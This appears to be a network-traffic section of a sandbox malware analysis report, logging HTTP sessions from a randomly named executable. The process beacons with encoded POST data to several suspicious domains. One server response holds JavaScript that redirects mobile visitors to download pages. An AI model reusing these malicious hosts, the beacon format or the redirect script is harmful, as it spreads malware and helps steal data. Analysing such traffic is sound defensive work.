                                                              Data Raw: 58 76 68 50 36 4c 3d 65 6c 2f 76 4b 6d 35 42 4d 77 4b 74 50 73 58 7a 39 59 63 76 5a 72 7a 55 46 75 63 38 34 37 47 76 54 53 57 72 7a 45 56 5a 4b 56 4b 37 44 58 50 44 2f 52 52 55 2b 42 42 42 39 76 6d 6b 74 70 69 4d 51 64 57 68 37 30 5a 5a 4c 36 2b 44 6e 37 53 73 61 50 30 52 4b 4c 4e 77 2b 4f 4e 70 47 33 74 32 42 45 42 66 70 4b 65 7a 50 6f 43 4d 50 4a 57 79 56 36 65 51 6d 2f 53 64 52 31 37 37 35 31 76 70 59 6e 45 35 4c 63 63 48 2f 73 73 4e 72 6b 56 59 59 39 63 6c 36 4c 4d 33 55 38 78 48 4a 37 31 62 74 43 2f 6d 30 34 44 44 6f 62 43 47 36 54 75 6b 4f 4d 59 39 6d 53 51 51 55 6a 50 2f 55 75 52 52 61 4f 46 35 70 72 46 72 73 48 69 68 68 69 5a 46 6a 45 37 39 62 75 42 7a 76 56 67 77 71 4b 4b 32 5a 77 61 6c 5a 2f 4b 30 31 4a 34 4d 51 44 2b 79 61 2b 51 4a 42 4a 6e 36 4d 39 78 38 34 4e 74 6f 43 53 65 56 6d 4b 4f 6e 6d 64 55 64 4a 51 70 53 72 4e 4e 32 45 36 32 67 35 43 45 4f 48 61 55 46 4e 62 37 7a 73 41 33 55 6c 44 52 54 69 58 74 32 71 49 31 59 31 78 48 42 52 43 50 79 46 51 7a 6b 74 65 46 49 38 45 31 6f 42 30 66 [TRUNCATED]
                                                              Data Ascii: XvhP6L=el/vKm5BMwKtPsXz9YcvZrzUFuc847GvTSWrzEVZKVK7DXPD/RRU+BBB9vmktpiMQdWh70ZZL6+Dn7SsaP0RKLNw+ONpG3t2BEBfpKezPoCMPJWyV6eQm/SdR17751vpYnE5LccH/ssNrkVYY9cl6LM3U8xHJ71btC/m04DDobCG6TukOMY9mSQQUjP/UuRRaOF5prFrsHihhiZFjE79buBzvVgwqKK2ZwalZ/K01J4MQD+ya+QJBJn6M9x84NtoCSeVmKOnmdUdJQpSrNN2E62g5CEOHaUFNb7zsA3UlDRTiXt2qI1Y1xHBRCPyFQzkteFI8E1oB0fa2m2Iqpi0F14moRfYvAR0kKsq3+UEQUt3ac6CZT6YnofIP1ZSXqpRDmoBGYaaZZqAUA2ktGbOFCCEB//+ij9FObB1l5kEApI2Har68SNjBM41H3GFgwfEXiybek5+/ny8PyAuMIm5ZrE1+bRsD+VVl5VITbQfKEEj5X8XxQs0s0qstmr1loFPD7Ui05+RZcUCNZx6xnaem8SFdEIwZlDyDHbwpxwkIvJAa2niNwh6Khd1293oCMDf0Tplatll/XbcaRn+eVAySSSbAMmL5AHh6ZFlcFvMadyzwsDbQGN5DFdrGkONbvTs9lPwNT98ktmfSeFGKbhxsErXpCyccEtDG/wA7LagXt9br0iyCyYzEEi1B6eHZ5JXzvhdWEePh5OOBuTweIDIRerYgtvi6dcSqBDpoSjSy1EcQr/rut5e0jMI45gbSUE/LoW4ohw1cv36zNeTedqWPgtn2pZqhnGsPRNJ32vq7GNopu74LMmBFPNC48zGf9r5umNtcvPcuw6vbxv6Hv81Ae0Ytp81F41U2UBeeZrB989DWHlgbtervW5O5E3WbP1+40ownJRfHDub5hgtOiPX365M1CwNeFheUENA01+XvQMoj4GHMNJYGUZuXEsSzLbxSNTDp+dX2ObHlQIMX9i4dnPOsvik1P89z320rqI37VwT9 [TRUNCATED]
                                                              Sep 11, 2024 22:55:22.976957083 CEST707INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Wed, 11 Sep 2024 20:55:22 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Vary: Accept-Encoding
                                                              Content-Encoding: gzip
                                                              Data Raw: 31 65 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d5 54 3d 6f db 30 10 dd f5 2b 04 4f 52 91 90 56 5a 3b 72 23 1b 88 8b a6 48 01 37 09 dc 22 43 90 e1 2c 9e 25 ba 12 a9 92 94 3f 60 e6 bf 97 96 15 23 e8 d4 41 43 7b 0b 8f 77 c7 87 87 f7 0e 4c 72 53 16 13 2f c9 11 d8 24 31 dc 14 38 f9 d0 7f ef df 48 b5 e0 8c a1 48 e8 b1 98 d0 66 c4 4b 16 92 ed dc 91 a2 30 a8 26 49 1e fd 39 ef 2a 09 6d db 0e d8 cd b4 17 91 71 b1 7d d3 a2 2d 14 3d 72 f0 fe 99 48 74 aa 78 65 7c b3 ab 70 dc 33 b8 35 74 05 6b 38 56 7b be 56 e9 b8 97 1b 53 e9 8f 94 ae 34 a9 35 2a 4d 06 11 29 80 5e 44 f1 20 1a c6 97 64 a5 7b 4e 86 e3 13 27 57 8b 58 80 c8 6a c8 1c ea 1b c0 89 c7 97 c1 86 0b 26 37 44 c0 9a 67 60 a4 6a 50 af 33 a7 32 29 c1 a4 79 40 83 2a 97 02 6d 05 cc 56 92 59 7e df 5c f9 fd 21 97 da 25 c0 42 ca c3 d0 df 7b 1a cd 77 5e a2 ac 4d b0 ac 45 6a b8 14 41 b8 5f 83 f2 41 a9 f1 d3 89 3c c0 e0 72 d8 8f e2 e1 88 6c c5 f9 b9 11 bf b6 71 94 c6 83 4c 44 72 54 33 92 ca 92 3a 56 a2 90 c0 e8 eb e8 29 81 88 1c 9c eb 9d 75 85 77 71 c4 7b be 6a c5 28 64 [TRUNCATED]
                                                              Data Ascii: 1eaT=o0+ORVZ;r#H7"C,%?`#AC{wLrS/$18HHfK0&I9*mq}-=rHtxe|p35tk8V{VS45*M)^D d{N'WXj&7Dg`jP32)y@*mVY~\!%B{w^MEjA_A<rlqLDrT3:V)uwq{j(d$W;O(309Q4+kEf",4`JrfgrSTjgo?T~G\|W.8XtAFnx{wAn[ 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              8192.168.2.75966923.225.34.75805428C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:55:24.950640917 CEST438OUTGET /u0n6/?Xt7D=9p4tP8lp52ndpXM&XvhP6L=TnXPJRFedBjcAOKsz8A4RrjZJ/J8mpS0RRmNukYQVSavKw+Pr3ZL00k0+s6r1anvS9TkkUZZGYzdsNqRXNwCKrFNx4FeTSUtckB8ipahHKvydrXWZ9yissqQQy/l7XTEZmUeENIc2eR0 HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Host: www.bashei.top
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Sep 11, 2024 22:55:25.554009914 CEST1236INHTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Wed, 11 Sep 2024 20:55:25 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Vary: Accept-Encoding
                                                              Data Raw: 35 64 39 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6a 73 2e 75 73 65 72 73 2e 35 31 2e [TRUNCATED]
                                                              Data Ascii: 5d9<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><script type="text/javascript" src="https://js.users.51.la/21851687.js"></script><script language="javascript">if(window.navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad)/i)) {setTimeout(function(){var arr=["https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a1.html","https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a2.html"];window.location.href=arr[parseInt(Math.random()*arr.length)]},0000); }else if(window.navigator.userAgent.match(/(Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i)){setTimeout(function(){var arr=["https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a1.html","https:/ [TRUNCATED]
                                                              Sep 11, 2024 22:55:25.554037094 CEST449INData Raw: 61 64 2f 35 37 36 30 31 38 36 39 2f 35 37 36 30 31 38 36 39 61 32 2e 68 74 6d 6c 22 2c 22 68 74 74 70 73 3a 2f 2f 61 61 35 37 36 30 31 38 36 39 2e 78 6e 2d 2d 74 6e 71 78 38 31 63 38 35 67 6e 31 6f 39 75 64 2e 63 6f 6d 2f 64 6f 77 6e 6c 6f 61 64
                                                              Data Ascii: ad/57601869/57601869a2.html","https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a5.html","https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a6.html","https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/
                                                              Sep 11, 2024 22:55:25.554052114 CEST5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              9192.168.2.7596703.33.130.190805428C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:55:30.611701012 CEST711OUTPOST /squz/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.tigre777gg.online
                                                              Origin: http://www.tigre777gg.online
                                                              Cache-Control: max-age=0
                                                              Content-Length: 219
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.tigre777gg.online/squz/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Raw: 58 76 68 50 36 4c 3d 4c 6a 32 61 56 4c 73 4d 39 45 6d 77 58 71 79 33 31 7a 2f 30 37 51 31 7a 44 6c 63 57 75 49 44 6e 34 51 6a 51 59 44 32 5a 53 54 44 64 63 73 71 63 38 39 31 53 51 56 58 56 58 59 47 56 46 69 45 4b 6e 55 49 4c 2f 55 72 43 6d 71 32 4e 76 69 4c 30 56 78 2b 45 56 42 64 56 73 69 78 5a 52 61 54 68 75 6b 44 2f 72 6e 4f 51 58 43 4c 4b 50 63 31 7a 77 4f 68 46 5a 6d 53 49 58 66 56 37 54 57 75 75 6a 65 2f 49 43 34 53 53 30 69 5a 6c 58 2f 4b 55 7a 65 35 77 6c 6e 6d 79 59 43 6f 41 36 4e 68 75 69 69 4b 68 76 66 70 75 69 45 44 38 35 36 71 30 6c 57 69 39 4e 43 73 32 6f 75 4b 77 4a 38 63 71 6e 58 71 46 78 66 66 79 64 55 53 78 35 56 78 30 42 41 3d 3d
                                                              Data Ascii: XvhP6L=Lj2aVLsM9EmwXqy31z/07Q1zDlcWuIDn4QjQYD2ZSTDdcsqc891SQVXVXYGVFiEKnUIL/UrCmq2NviL0Vx+EVBdVsixZRaThukD/rnOQXCLKPc1zwOhFZmSIXfV7TWuuje/IC4SS0iZlX/KUze5wlnmyYCoA6NhuiiKhvfpuiED856q0lWi9NCs2ouKwJ8cqnXqFxffydUSx5Vx0BA==


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              10192.168.2.7596713.33.130.190805428C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:55:33.168991089 CEST731OUTPOST /squz/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.tigre777gg.online
                                                              Origin: http://www.tigre777gg.online
                                                              Cache-Control: max-age=0
                                                              Content-Length: 239
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.tigre777gg.online/squz/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Raw: 58 76 68 50 36 4c 3d 4c 6a 32 61 56 4c 73 4d 39 45 6d 77 58 4b 69 33 6d 41 58 30 73 67 31 79 4d 46 63 57 33 34 44 6a 34 51 76 51 59 43 79 4a 52 6d 72 64 53 75 79 63 37 4d 31 53 65 31 58 56 66 34 47 51 59 53 45 42 6e 56 30 6c 2f 55 58 43 6d 71 53 4e 76 6a 37 30 55 42 43 48 55 52 64 58 6b 43 78 66 66 36 54 68 75 6b 44 2f 72 6d 71 32 58 43 54 4b 4d 74 6c 7a 2f 50 67 54 48 32 53 48 41 76 56 37 58 57 75 71 6a 65 2f 71 43 38 79 30 30 67 68 6c 58 36 75 55 79 4c 4e 7a 72 58 6d 6f 46 53 70 63 30 59 59 52 6c 42 75 76 6d 38 39 4c 6c 32 50 6f 34 4d 33 57 2f 30 75 52 54 54 55 4e 73 73 75 47 65 61 42 66 6c 57 75 64 38 39 72 54 43 6a 33 62 30 48 51 77 58 7a 74 51 41 6d 67 30 68 70 42 76 65 35 62 61 51 31 59 2b 76 65 41 3d
                                                              Data Ascii: XvhP6L=Lj2aVLsM9EmwXKi3mAX0sg1yMFcW34Dj4QvQYCyJRmrdSuyc7M1Se1XVf4GQYSEBnV0l/UXCmqSNvj70UBCHURdXkCxff6ThukD/rmq2XCTKMtlz/PgTH2SHAvV7XWuqje/qC8y00ghlX6uUyLNzrXmoFSpc0YYRlBuvm89Ll2Po4M3W/0uRTTUNssuGeaBflWud89rTCj3b0HQwXztQAmg0hpBve5baQ1Y+veA=


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              11192.168.2.7596723.33.130.190805428C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:55:35.708132029 CEST1744OUTPOST /squz/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.tigre777gg.online
                                                              Origin: http://www.tigre777gg.online
                                                              Cache-Control: max-age=0
                                                              Content-Length: 1251
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.tigre777gg.online/squz/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Raw: 58 76 68 50 36 4c 3d 4c 6a 32 61 56 4c 73 4d 39 45 6d 77 58 4b 69 33 6d 41 58 30 73 67 31 79 4d 46 63 57 33 34 44 6a 34 51 76 51 59 43 79 4a 52 67 7a 64 53 62 75 63 38 66 74 53 64 31 58 56 56 59 47 52 59 53 45 51 6e 56 73 70 2f 55 62 6f 6d 73 57 4e 39 52 7a 30 64 54 6d 48 62 52 64 58 6f 69 78 65 52 61 54 6f 75 67 6e 37 72 6d 36 32 58 43 54 4b 4d 75 4e 7a 37 65 67 54 41 47 53 49 58 66 56 6e 54 57 75 53 6a 66 62 51 43 39 7a 50 33 55 56 6c 58 61 2b 55 2b 64 52 7a 70 33 6d 75 57 69 70 55 30 59 63 77 6c 42 7a 44 6d 2f 68 74 6c 32 33 6f 34 4e 4f 54 70 30 71 4b 51 67 52 5a 71 4b 4f 6a 54 62 42 31 70 56 75 48 69 76 71 78 41 52 54 75 31 55 51 74 65 6c 73 6f 56 31 77 71 36 62 34 2b 57 5a 79 47 55 6c 4a 34 77 37 47 69 32 59 65 42 47 58 78 76 39 7a 77 6f 6b 2f 5a 56 68 68 70 4f 44 54 56 39 43 63 42 58 6e 72 65 42 72 47 42 4c 37 7a 62 57 32 47 70 53 48 30 53 67 69 73 46 74 31 38 48 74 54 72 71 49 73 66 43 37 32 4f 6b 61 32 53 69 63 4d 4b 55 38 54 4b 6f 54 35 70 37 76 6f 35 50 66 63 67 75 58 6a 33 31 53 63 72 73 [TRUNCATED]
                                                              Data Ascii: XvhP6L=Lj2aVLsM9EmwXKi3mAX0sg1yMFcW34Dj4QvQYCyJRgzdSbuc8ftSd1XVVYGRYSEQnVsp/UbomsWN9Rz0dTmHbRdXoixeRaTougn7rm62XCTKMuNz7egTAGSIXfVnTWuSjfbQC9zP3UVlXa+U+dRzp3muWipU0YcwlBzDm/htl23o4NOTp0qKQgRZqKOjTbB1pVuHivqxARTu1UQtelsoV1wq6b4+WZyGUlJ4w7Gi2YeBGXxv9zwok/ZVhhpODTV9CcBXnreBrGBL7zbW2GpSH0SgisFt18HtTrqIsfC72Oka2SicMKU8TKoT5p7vo5PfcguXj31ScrsAACkPvGEP/fmnvbnioR/0kSkKKy0QMnDzP6ySlZKuetnrnwinHWYT9GCfaLwhYXUwlLnn2redTZDf/YgN7cv9sT1+lqSKwiz6VeoUQT5Ri1b4kRkay6RqrwiHyVUToLNrfbt9J6AbG870g5tanirP6vQGVysHVD2hEVSPaZQYBbYy6bPtJcQu9iDAERU9zOx67dr6EjirnVd9g6KnXS61qJl26a2Viq7fQj2l/8085gHaCtxgH8w7VDLVy/77BdRuGC5aqzW16jkHlY9eoYqOs2Y30Muj4GVhtgwGVxNco1TeoZOP1scOfIgp7MKEsgWmTuOpWUzhwQ+q6ZUJeRLDUfctJK2fRpYQhoJ3DvstrAyAJANJQsoHd+NfGBKHiNBJwtpZM58SSZC6c5NTHyypsNmInwkLAGKbcowlOV/0i8f8KCYqbJlxeWH5P+QfKqsTr7tmSHtpgu+XBsemf40nZAy0hFCfLmsKULowEA3zyhQ547U2aXWBW+d7C1oq1+pGWc4yAkArXb4zqjVfT5f1v9KAXDRVxhHg5ajuQAf1v8npCNGZgXNvjJ+XtjznJE805fH4iAt6r2eIB1I4MUED9yWy2XN5VjhyFIpXsj/du4FM7srljr68tMvbtGx9Whipan7ttREGQG2mIdNwVq5toHTnLpjT7E3xE [TRUNCATED]


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              12192.168.2.7596733.33.130.190805428C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:55:38.252099991 CEST445OUTGET /squz/?XvhP6L=Ghe6W9NY/2rmdpfmin3r4worEkhFv7TpyCLvYyDJFGDSfcbT98d0cG77XKGOFhcNgHgKwlDxqJr9ryKJWiSYVmpZriF7ZoTYlTDCrmWRZjH+de0P0vE8b0uWMMVzUUSCh4ryC6am+BcV&Xt7D=9p4tP8lp52ndpXM HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Host: www.tigre777gg.online
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Sep 11, 2024 22:55:38.710616112 CEST423INHTTP/1.1 200 OK
                                                              Server: openresty
                                                              Date: Wed, 11 Sep 2024 20:55:38 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 283
                                                              Connection: close
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 58 76 68 50 36 4c 3d 47 68 65 36 57 39 4e 59 2f 32 72 6d 64 70 66 6d 69 6e 33 72 34 77 6f 72 45 6b 68 46 76 37 54 70 79 43 4c 76 59 79 44 4a 46 47 44 53 66 63 62 54 39 38 64 30 63 47 37 37 58 4b 47 4f 46 68 63 4e 67 48 67 4b 77 6c 44 78 71 4a 72 39 72 79 4b 4a 57 69 53 59 56 6d 70 5a 72 69 46 37 5a 6f 54 59 6c 54 44 43 72 6d 57 52 5a 6a 48 2b 64 65 30 50 30 76 45 38 62 30 75 57 4d 4d 56 7a 55 55 53 43 68 34 72 79 43 36 61 6d 2b 42 63 56 26 58 74 37 44 3d 39 70 34 74 50 38 6c 70 35 32 6e 64 70 58 4d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?XvhP6L=Ghe6W9NY/2rmdpfmin3r4worEkhFv7TpyCLvYyDJFGDSfcbT98d0cG77XKGOFhcNgHgKwlDxqJr9ryKJWiSYVmpZriF7ZoTYlTDCrmWRZjH+de0P0vE8b0uWMMVzUUSCh4ryC6am+BcV&Xt7D=9p4tP8lp52ndpXM"}</script></head></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              13192.168.2.75967465.108.194.49805428C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:55:43.828790903 CEST690OUTPOST /bzo0/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.maya24.xyz
                                                              Origin: http://www.maya24.xyz
                                                              Cache-Control: max-age=0
                                                              Content-Length: 219
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.maya24.xyz/bzo0/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Raw: 58 76 68 50 36 4c 3d 47 4b 2f 43 4a 57 50 68 70 4e 4a 57 63 4d 63 68 35 77 44 73 4e 65 65 38 65 58 56 6d 6e 51 55 55 58 4b 41 61 55 76 4b 74 68 50 42 4b 73 6b 74 53 32 61 73 34 67 4f 4b 51 2f 44 61 79 6d 58 38 6e 50 36 66 63 35 77 4e 35 6b 4f 4c 42 33 79 6e 68 64 74 4a 73 41 57 71 50 68 61 52 49 4e 6e 56 36 6e 53 52 62 4d 30 68 4f 4c 73 38 6e 4c 7a 6a 4d 4d 31 66 37 54 30 2f 49 4e 57 6a 37 6a 54 6f 66 74 55 49 6a 39 73 4d 6e 45 4b 47 58 42 35 6a 4a 6b 43 46 74 31 6e 66 78 48 59 61 43 50 4d 6d 67 6d 4b 4d 61 33 79 33 67 53 65 59 75 46 51 77 73 6a 52 41 6d 6e 5a 79 70 73 78 68 39 59 49 76 52 57 48 4f 2b 65 5a 4a 70 6f 33 67 5a 47 38 4e 65 72 51 3d 3d
                                                              Data Ascii: XvhP6L=GK/CJWPhpNJWcMch5wDsNee8eXVmnQUUXKAaUvKthPBKsktS2as4gOKQ/DaymX8nP6fc5wN5kOLB3ynhdtJsAWqPhaRINnV6nSRbM0hOLs8nLzjMM1f7T0/INWj7jToftUIj9sMnEKGXB5jJkCFt1nfxHYaCPMmgmKMa3y3gSeYuFQwsjRAmnZypsxh9YIvRWHO+eZJpo3gZG8NerQ==
                                                              Sep 11, 2024 22:55:44.781991005 CEST1236INHTTP/1.1 404 Not Found
                                                              Connection: close
                                                              x-powered-by: PHP/7.4.33
                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                              cache-control: no-cache, must-revalidate, max-age=0
                                                              content-type: text/html; charset=UTF-8
                                                              link: <https://maya24.xyz/wp-json/>; rel="https://api.w.org/"
                                                              transfer-encoding: chunked
                                                              content-encoding: br
                                                              vary: Accept-Encoding
                                                              date: Wed, 11 Sep 2024 20:55:44 GMT
                                                              server: LiteSpeed
                                                              Data Raw: 35 31 34 38 0d 0a 64 67 19 a2 28 eb b4 1e 32 12 61 d1 fa 21 40 23 65 e1 fc fd 23 74 f8 9c f7 af 6f 6a 7d 27 c0 7e fc 33 6f 30 b6 d4 52 94 e4 2b 29 53 a5 68 73 cc 64 7b 05 4d ba 57 1c 08 34 f5 24 d3 a1 48 2d 49 59 76 5d ff f9 a6 59 df 64 55 3e fe 5f d3 e5 d8 72 08 0a 00 c1 53 96 67 3a bd e9 d9 cc d9 73 1d 5d 5a 10 78 94 10 93 04 02 80 96 34 5a ff ff be a9 d9 8b 8e b1 db d2 45 17 2b 9f c3 4d dc 75 88 59 87 74 ac 6e 78 e7 f8 ff 99 29 06 c0 86 01 88 22 b1 00 48 16 03 82 45 bc f7 be f7 fe ff f3 31 00 07 20 45 81 41 5c 26 85 0c 52 5c 0a ca 05 48 a9 10 57 5b 50 96 43 08 a5 6b 4a 1b 83 63 ee 5c bb 1e 80 2e 40 87 54 b9 4c 45 e3 b3 95 57 45 d1 7a 19 d6 bc f3 d9 a3 6e 73 5e 0b 01 42 08 e1 4b 01 6d 88 fa 7e db 9f 74 cd 0c 5b 03 21 38 0e d9 79 7f 1b aa 9d d3 9d a4 e3 9f 25 40 08 cc b0 19 72 88 10 50 b8 5a 73 fd bb c3 b3 aa c9 fd 2d 79 47 5e ae 08 21 ef d7 a1 d5 97 35 7c 0a c6 26 1b 4f ac ae 14 12 85 ef 88 c2 28 b9 3f 68 92 9f 8f 40 ae c8 70 33 07 b2 11 35 01 ec 5b 28 fe 7d 16 dd df c6 2f 57 ef cf 92 e4 0a be ef [TRUNCATED]
                                                              Data Ascii: 5148dg(2a!@#e#toj}'~3o0R+)Shsd{MW4$H-IYv]YdU>_rSg:s]Zx4ZE+MuYtnx)"HE1 EA\&R\HW[PCkJc\.@TLEWEzns^BKm~t[!8y%@rPZs-yG^!5|&O(?h@p35[(}/Wtz\4]%^mo%Y3a'C+NDIFX@2NJca,U1$Wqq)'=rrzTx $2q1KUtScgW6qm]Z`~>|1INke^C]+% {1wYcmQt3i[mAYb/n!V-[<iXCtmMNsS~k@:]ak7^'9Jx4pLgYaJp=\elL'2awm`61)We:tZ,G*6]`64}svYF<}IO7=a[0>??xB<GQxv
                                                              Sep 11, 2024 22:55:44.782011986 CEST1236INData Raw: cd f4 f7 d7 e1 7b 1d c5 c7 4b 8f de 2b 6b 1e 83 75 a2 41 e6 31 dc 07 6c 23 4b ff f9 f8 fd 1b f3 c1 29 d3 a8 7a 1f 85 38 3e e6 3b 83 87 e3 d1 0b 4f b7 8b 90 06 6a e2 03 b2 0b 70 5f c2 0f 94 21 ca 68 46 91 49 61 b6 c2 33 16 20 0e f1 d5 3b 9f 54 4c
                                                              Data Ascii: {K+kuA1l#K)z8>;Ojp_!hFIa3 ;TLJ'(fe 68sb!k07PAUA}r@|4C(^1AB|#Z4-l),b*}Ue_cV/IU~G:Y@jx)F@
                                                              Sep 11, 2024 22:55:44.782037020 CEST448INData Raw: aa 10 b6 da 84 b8 85 81 ce 42 f1 aa 53 85 d7 59 0f b0 ea e4 e1 07 39 4d c5 f7 5a 88 ef 8b 69 74 46 45 f4 24 4c 46 a3 8f 76 e3 e5 7f 40 db a7 0f 4f 9f 7e 34 1f 9e fe 93 02 7c 78 7a 7a 02 15 02 14 db c5 6a 3c cc 56 af 13 e2 27 92 c9 4a 8d 1e ff 7f
